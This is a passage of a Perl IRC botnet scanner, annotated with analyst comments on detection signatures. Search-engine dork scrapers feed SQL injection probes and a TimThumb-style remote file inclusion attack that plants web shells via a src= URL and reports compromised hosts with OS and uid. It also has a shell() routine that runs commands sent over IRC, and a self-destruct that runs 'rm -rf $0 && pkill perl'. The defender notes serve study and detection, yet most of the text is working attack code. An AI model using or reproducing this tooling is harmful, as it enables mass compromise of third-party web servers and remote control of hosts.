  599. if ($num > 0) {
  600. foreach my $site (@list) {
  601. $count++;
  602. if ($count == $num-1) { &msg("$chan","$sqllogo15(9@7$engine15)10 Scan finish..."); }
  603. my $test = "http://".$site.$bug."'";
  604. my $vuln = "http://".$site.$bug;
  605. my $sqlsite = "http://".$site.$bug;
  606. my $html = &get_content($test);
  607. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  # Verbose database errors shown to clients are what this matches on.
  608. if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  609. &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MySQL15) 03,01".$vuln);}
  610. elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  611. &msg("$chan","$sqllogo15(04@3$engine15)15(09@04MsSQL15) 03,01".$vuln);}
  612. elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  613. &msg("$chan","$sqllogo15(4@3$engine15)15(09@04MsAccess15) 03,01".$vuln);}
  # This last branch has an empty body; the sleep(2) after exit is never
  # reached.
  614. elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  615. } exit; sleep(2); }
  616. }
  617. }
  618. }
  619. }
  620. #########################################
  # thumb($chan, $bug, $dork, $engine): for every host returned by
  # search_engine(), request "<host><bug>?src=<remote .php URL>" and then probe
  # the fixed cache file names from the configuration block. Hosts whose reply
  # carries the marker "JANCOK- exploit" are reported to $admin and the channel
  # with OS, disk and uid details scraped from the page.
  #
  # Detection points visible in this routine:
  #   - access-log entries with a src= parameter that points at an external
  #     .php URL;
  #   - GET requests for the fixed file names under cache/, temp/ and
  #     wp-content/uploads/thumb-temp/;
  #   - response bodies or files containing "JANCOK- exploit".
  621. sub thumb() {
  622. my $chan = $_[0];
  623. my $bug = $_[1];
  624. my $dork = $_[2];
  625. my $engine = $_[3];
  626. my $count = 0;
  627. my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
  628. my $num = scalar(@list);
  629. if ($num > 0) {
  630. foreach my $site (@list) {
  631. $count++;
  632. if ($count == $num-1) {
  633. &msg("$chan","$thumblogo 15(09@03$engine15)2 Scan finish...");
  634. }
  635. my $vuln = "http://".$site.$bug."?src=".$thumbshell;
  # The new lexical $bot shadows the configured $bot from here on; the
  # right-hand side still reads the outer one.
  636. my $bot = "http://".$site.$bug."?src=".$bot;
  637. my $cek = &get_content($vuln);sleep(2);&get_content($bot);sleep(2);
  # Only replies containing "Unable to " are followed up.
  638. if ($cek =~ /Unable to /i) {
  # $tpath is $bug with its last path segment removed, i.e. the directory
  # that contains the script.
  639. (my $tpath = $bug)=~ s{/[^/]+\z}{};
  640. my $vuln2 = "http://".$site.$tpath.$folder1;
  641. my $vuln3 = "http://".$site.$tpath.$folder2;
  642. my $vuln4 = "http://".$site.$tpath.$folder3;
  643. my $vuln5 = "http://".$site.$tpath.$folder4;
  644. my $vuln6 = "http://".$site.$folder5;
  645. my $exbot1 = "http://".$site.$tpath.$bot1;
  646. my $exbot2 = "http://".$site.$tpath.$bot2;
  647. my $exbot3 = "http://".$site.$tpath.$bot3;
  648. my $exbot4 = "http://".$site.$tpath.$bot4;
  649. my $exbot5 = "http://".$site.$bot5;
  650. my $runbot1 = &get_content($exbot1);sleep(3);
  651. my $runbot2 = &get_content($exbot2);sleep(3);
  652. my $runbot3 = &get_content($exbot3);sleep(3);
  653. my $runbot4 = &get_content($exbot4);sleep(2);
  654. my $runbot5 = &get_content($exbot5);sleep(2);
  655. my $backup = &get_content($runing);sleep(3);
  656. my $check1 = &get_content($vuln2);sleep(2);
  657. my $check2 = &get_content($vuln3);sleep(2);
  658. my $check3 = &get_content($vuln4);sleep(2);
  659. my $check4 = &get_content($vuln5);sleep(2);
  660. my $check5 = &get_content($vuln6);sleep(2);
  661. my $os = "";
  662. my $free = "";
  663. my $uid = "";
  # The five blocks below are identical apart from the response and URL they
  # use: look for the marker, scrape OS / total space / uid, report.
  664. if ($check1 =~ /JANCOK- exploit/i) {
  665. if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  666. if ($check1 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  667. if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  668. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  669. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  670. }
  671. if ($check2 =~ /JANCOK- exploit/i) {
  672. if ($check2 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  673. if ($check2 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  674. if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  675. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  676. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  677. }
  678. if ($check3 =~ /JANCOK- exploit/i) {
  679. if ($check3 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  680. if ($check3 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  681. if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  682. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  683. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  684. }
  685. if ($check4 =~ /JANCOK- exploit/i) {
  686. if ($check4 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  687. if ($check4 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  688. if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  689. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  690. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  691. }
  692. if ($check5 =~ /JANCOK- exploit/i) {
  693. if ($check5 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  694. if ($check5 =~ m/Total space: <b>(.*?)<\/b><br>/) {$free = $1;}
  695. if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  696. &msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  697. &msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
  698. }
  699. }
  700. }
  701. }
  702. }
  703. #########################################
  704.  
  # search_engine($chan, $bug, $dork, $engine, $logo): run the dork through
  # the one scraper whose name equals $engine, de-duplicate the hosts with
  # clean(), post the raw and de-duplicated counts to $chan and return the
  # de-duplicated list. $bug is accepted but not used here.
  705. sub search_engine() {
  706. my (@total,@clean);
  707. my $chan = $_[0];
  708. my $bug = $_[1];
  709. my $dork = $_[2];
  710. my $engine = $_[3];
  711. my $logo = $_[4];
  # The comparison is an exact, case-sensitive string match on the engine
  # label.
  712. if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
  713. if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
  714. if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
  715. if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
  716. if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
  717. if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
  718. if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
  719. @clean = clean(@total);
  720. &msg("$chan","$logo15(9@2$engine15) Total:14 (".scalar(@total).") Clean:14 (".scalar(@clean).")");
  721. return @clean;
  722. }
  723.  
  724. #########################################
  725.  
  # isFound($link, $reqexp): fetch $link with get_content() and return 1 when
  # the body matches $reqexp, otherwise 0. $reqexp is interpolated into the
  # pattern as a regular expression, not as a literal string.
  726. sub isFound() {
  727. my $status = 0;
  728. my $link = $_[0];
  729. my $reqexp = $_[1];
  730. my $res = &get_content($link);
  731. if ($res =~ /$reqexp/) { $status = 1 }
  732. return $status;
  733. }
  734.  
  # get_content($url): HTTP GET of $url, returning the response body.
  # Every request carries the fixed User-Agent held in $uagent and uses a
  # 7-second timeout. The status is not checked, so the body of an error
  # response is returned as well.
  735. sub get_content() {
  736. my $url = $_[0];
  737. my $ua = LWP::UserAgent->new(agent => $uagent);
  738. $ua->timeout(7);
  739. my $req = HTTP::Request->new(GET => $url);
  740. my $res = $ua->request($req);
  741. return $res->content;
  742. }
  743. ######################################### SEARCH ENGINE gibla
  744. sub google() {
  745. my @list;
  746. my $key = $_[0];
  747. for (my $i=0; $i<=1000; $i+=100){
  748. my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
  749. my $res = search_engine_query($search);
  750. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  751. my $link = $1;
  752. if ($link !~ /google/){
  753. my @grep = links($link);
  754. push(@list,@grep);
  755. }
  756. }
  757. }
  758. return @list;
  759. }
  760.  
  761. sub alltheweb() {
  762. my @list;
  763. my $key = $_[0];
  764. for (my $i=0; $i<=1000; $i+=100) {
  765. my $search = ("http://us.yhs4.search.yahoo.com/yhs/search?fr=alltheweb&cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
  766. my $res = search_engine_query($search);
  767. while ($res =~ m/\*\*http%3a\/\/(.+?)\">/g) {
  768. my $link = $1;
  769. if ($link !~ /bingj|yahoo/) {
  770. $link =~ s/ //g;
  771. $link =~ s/%3f/\?/g;
  772. my @grep = links($link);
  773. push(@list,@grep);
  774. }
  775. }
  776. }
  777. return @list;
  778. }
  779.  
  780. sub uol() {
  781. my @list;
  782. my $key = $_[0];
  783. for (my $i=1; $i<=1000; $i+=10) {
  784. my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
  785. my $res = search_engine_query($search);
  786. while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
  787. my $link = $1;
  788. if ($link !~ /busca|uol|yahoo/) {
  789. my @grep = links($link);
  790. push(@list,@grep);
  791. }
  792. }
  793. }
  794. return @list;
  795. }
  796.  
  797. sub bing() {
  798. my @list;
  799. my $key = $_[0];
  800. for (my $i=1; $i<=1000; $i+=10) {
  801. my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
  802. my $res = search_engine_query($search);
  803. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  804. my $link = $1;
  805. if ($link !~ /msn|live|bing/) {
  806. my @grep = links($link);
  807. push(@list,@grep);
  808. }
  809. }
  810. }
  811. return @list;
  812. }
  813.  
  # altavista: scrape it.altavista.com result pages for one search term.
  #   $_[0]    search term; URL-encoded by key()
  #   returns  flat list built from links() for each accepted hit
  # Defender note: fixed parameters itag=ody, kgs=0, kls=0, dis=1 with stq=
  # stepping 1, 11, ... 991 (100 plain-HTTP requests per term).
  814. sub altavista() {
  815. my @list;
  816. my $key = $_[0];
  817. for (my $i=1; $i<=1000; $i+=10){
  818. my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
  819. my $res = search_engine_query($search);
  # Non-greedy capture from '<span class=ngrn>' to the first '/', so only the
  # leading part of the displayed URL (up to its first slash) is kept.
  820. while ($res =~ m/<span class=ngrn>(.+?)\//g) {
  821. my $link = $1;
  822. if ($link !~ /altavista/){
  # Strip leftover '<' characters and spaces from the captured markup.
  823. $link =~ s/<//g;
  824. $link =~ s/ //g;
  825. my @grep = links($link);
  826. push(@list,@grep);
  827. }
  828. }
  829. }
  830. return @list;
  831. }
  832.  
  # ask: scrape it.ask.com result pages for one search term.
  #   $_[0]    search term; URL-encoded by key()
  #   returns  flat list built from links() for each accepted hit
  # Defender note: every request repeats the same hard-coded qid value and
  # the parameters o=0, l=dir, qsrc=0, dm=all; page= runs 0, 10, ... 1000
  # (101 plain-HTTP requests per term). The constant qid is a usable log signature.
  833. sub ask() {
  834. my @list;
  835. my $key = $_[0];
  836. for (my $i=0; $i<=1000; $i+=10) {
  837. my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
  838. my $res = search_engine_query($search);
  # Capture the href target that is immediately followed by ' onmousedown='.
  839. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
  840. my $link = $1;
  # Here the filter is the literal "ask.com" (dot escaped), still unanchored.
  841. if ($link !~ /ask\.com/){
  842. my @grep = links($link);
  843. push(@list,@grep);
  844. }
  845. }
  846. }
  847. return @list;
  848. }
  849.  
  # yahoo: scrape Yahoo result pages for one search term.
  #   $_[0]    search term; URL-encoded by key()
  #   returns  flat list built from links() for each accepted hit
  # Defender note: b= is incremented by 1 from 1 to 500, so a single call
  # sends 500 plain-HTTP requests with the fixed parameters ei=UTF-8,
  # fr=yfp-t-501, fp_ip=IT, pstart=1.
  850. sub yahoo() {
  851. my @list;
  852. my $key = $_[0];
  853. for (my $i=1; $i<=500; $i+=1) {
  854. my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
  855. my $res = search_engine_query($search);
  # Capture the text between '26u=' and '%26w='. The value is passed on
  # exactly as captured; no percent-decoding is applied in this sub.
  856. while ($res =~ m/26u=(.*?)%26w=/g) {
  857. my $link = $1;
  858. if ($link!~ /yahoo/){
  859. my @grep = links($link);
  860. push(@list,@grep);
  861. }
  862. }
  863. }
  864. return @list;
  865. }
  866.  
  867. #########################################
  sub clean() {
      # Collapse runs of "/" and drop repeats, keeping first-seen order.
      # The loop variable aliases @_, so the caller's own values are rewritten
      # too. The empty prototype is kept exactly as declared.
      my %seen;
      my @unique;
      for my $entry (@_) {
          $entry =~ s{/+}{/}g;
          push @unique, $entry unless $seen{$entry}++;
      }
      return @unique;
  }
  878.  
  sub key() {
      # Encode a search term for use in a query string: space becomes "+",
      # and a fixed set of punctuation becomes its %XX escape. Characters
      # outside this table (including "%" and "+") pass through untouched.
      # Call sites earlier in the file are compiled before this definition,
      # so the empty prototype does not reject their argument; it is kept as-is.
      my ($dork) = @_;
      my %escape_for = (
          ' '  => '+',
          ':'  => '%3A',
          '/'  => '%2F',
          '?'  => '%3F',
          '&'  => '%26',
          '"'  => '%22',
          ','  => '%2C',
          '\\' => '%5C',
          '@'  => '%40',
          '['  => '%5B',
          ']'  => '%5D',
          '='  => '%3D',
          '|'  => '%7C',
      );
      # One pass is equivalent to the sequential substitutions: no replacement
      # text contains a character that appears in the table.
      $dork =~ s{([ :/?&",\\\@\[\]=|])}{$escape_for{$1}}g;
      return $dork;
  }
  897.  
  sub links() {
      # Expand one scheme-less URL string into three variants, in this order:
      # the full string, the host part, and the parent directory. Each gets a
      # trailing "/" and then has every "//" pair replaced by "/".
      # The empty prototype is kept as declared.
      my ($target) = @_;

      # Parent directory: drop everything after the last "/".
      (my $dir_part = $target) =~ s{(.*)/[^/]*$}{$1};

      # Host: keep the first run of host-name characters that precedes a "/".
      (my $host_part = $target) =~ s{([-a-zA-Z0-9\.]+)/.*}{$1};

      my @variants = map {
          my $variant = "$_/";
          $variant =~ s{//}{/}g;
          $variant;
      } ($target, $host_part, $dir_part);

      return @variants;
  }
  914.  
  # search_engine_query: minimal hand-written HTTP client used by the engine
  # subs above. Splits the URL into host and request path, opens a TCP
  # connection to port 80 and sends one HTTP/1.0 GET.
  #   $_[0]    URL; a leading "http://" is stripped
  #   returns  everything read from the socket (status line, headers and
  #            body), lines joined with a space, or "" if nothing was read
  # Defender note: the request has a fixed shape -- HTTP/1.0, headers in the
  # order Host, Accept: */*, User-Agent, and nothing else -- sent in clear
  # text to port 80, which makes it straightforward to match on the wire.
  915. sub search_engine_query($) {
  916. my $url = $_[0];
  917. $url =~ s/http:\/\///;
  918. my $host = $url;
  919. my $query = $url;
  920. my $page = "";
  921. $host =~ s/href=\"?http:\/\///;
  # Reduce $host to the first run of host-name characters before a "/".
  922. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  # $host is interpolated as a regex without quoting, so its dots match any
  # character; the first match is removed, leaving the path and query.
  923. $query =~ s/$host//;
  924. if ($query eq "") { $query = "/"; }
  # Errors raised inside the block are trapped by eval and $@ is never checked.
  925. eval {
  # "or return" leaves only the eval block; the sub then returns the empty $page.
  926. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  # $uagent is not set in this sub -- presumably a file-level variable; verify.
  927. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
  # List-context read: collects every line until the peer closes the connection.
  928. my @pages = <$sock>;
  929. $page = "@pages";
  930. close($sock);
  931. };
  932. return $page;
  933. }
  934.  
  935. #########################################
  936.  
  # shell: remote command execution handler. Runs a command string received
  # from the IRC side on the local host and relays its output back.
  #   $_[0]    reply target handed to msg() (used as the PRIVMSG destination)
  #   $_[1]    command string
  # Nothing in this sub validates or restricts the command; whether the caller
  # checks isAdmin() first cannot be seen from here.
  # Defender note: the command is run through backticks with " 2>&1 3>&1"
  # appended, so it goes through a shell. It runs in a grandchild whose
  # intermediate parent exits at once, so the command is no longer a child of
  # the long-lived bot process. Hunt for perl processes spawning a shell whose
  # command line ends in that redirect suffix.
  937. sub shell() {
  938. my $path = $_[0];
  939. my $cmd = $_[1];
  # "cd" is handled in-process so the working directory persists for later
  # commands; the pattern is unanchored, so any command containing "cd " hits it.
  940. if ($cmd =~ /cd (.*)/) {
  941. chdir("$1") || &msg("$path","4No such file or directory");
  942. return;
  943. }
  # $pid is not declared with my here, so it is a package variable.
  # Parent: waits only for the first child, which exits immediately below.
  944. elsif ($pid = fork) { waitpid($pid, 0); }
  # First child forks again and exits; the grandchild does the work.
  945. else { if (fork) { exit; } else {
  946. my @output = `$cmd 2>&1 3>&1`;
  947. my $c = 0;
  948. foreach my $output (@output) {
  949. $c++;
  # chop removes the last character whatever it is (normally the newline).
  950. chop $output;
  951. &msg("$path","$output");
  # Pause two seconds after every fifth line sent.
  952. if ($c == 5) { $c = 0; sleep 2; }
  953. }
  954. exit;
  955. }}
  956. }
  957.  
  sub isAdmin() {
      # Returns 1 when the given nick is string-equal to the file-level $admin,
      # otherwise 0. The comparison is exact and case-sensitive, and the nick is
      # the only thing checked in this sub (no host mask, no password).
      my ($candidate) = @_;
      return ($candidate eq $admin) ? 1 : 0;
  }
  964.  
  sub msg() {
      # Send one PRIVMSG on the current IRC socket.
      # Does nothing unless called with exactly two arguments (target, text).
      # The text is interpolated into the protocol line as given.
      return if @_ != 2;
      my ($target, $text) = @_;
      sendraw($IRC_cur_socket, "PRIVMSG $target :$text");
  }
  969.  
  # SIGN: tamper check on the two marker globals set at the top of the file.
  # If $powered does not contain "t" or $mail does not contain "bot", it
  # prints a taunt and replaces the process with a shell command that deletes
  # $0 and runs "pkill perl". Takes no arguments; otherwise it does nothing.
  # Analyst note: a copy whose marker strings were edited removes itself when
  # run, and pkill signals other perl processes the user may signal as well.
  # Preserve a copy of the file before executing or modifying a sample.
  970. sub SIGN() {
  971. if (($powered !~ /t/)||($mail !~ /bot/)) {
  972. print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
  # exec() does not return on success. $0 is interpolated unquoted into the
  # shell string; what it holds here depends on code outside this block.
  973. exec("rm -rf $0 && pkill perl");
  974. }
  975. }
  976.  
  sub nick() {
      # Issue an IRC NICK change. Ignored unless exactly one argument is given.
      # sendraw is called with the command string only; no socket handle is
      # passed in this call.
      return if @_ != 1;
      my ($new_nick) = @_;
      sendraw("NICK $new_nick");
  }
  981.  
  sub notice() {
      # Send an IRC NOTICE. Ignored unless called with exactly (target, text).
      # sendraw is called with the command string only; no socket handle is
      # passed in this call.
      return if @_ != 2;
      my ($target, $text) = @_;
      sendraw("NOTICE $target :$text");
  }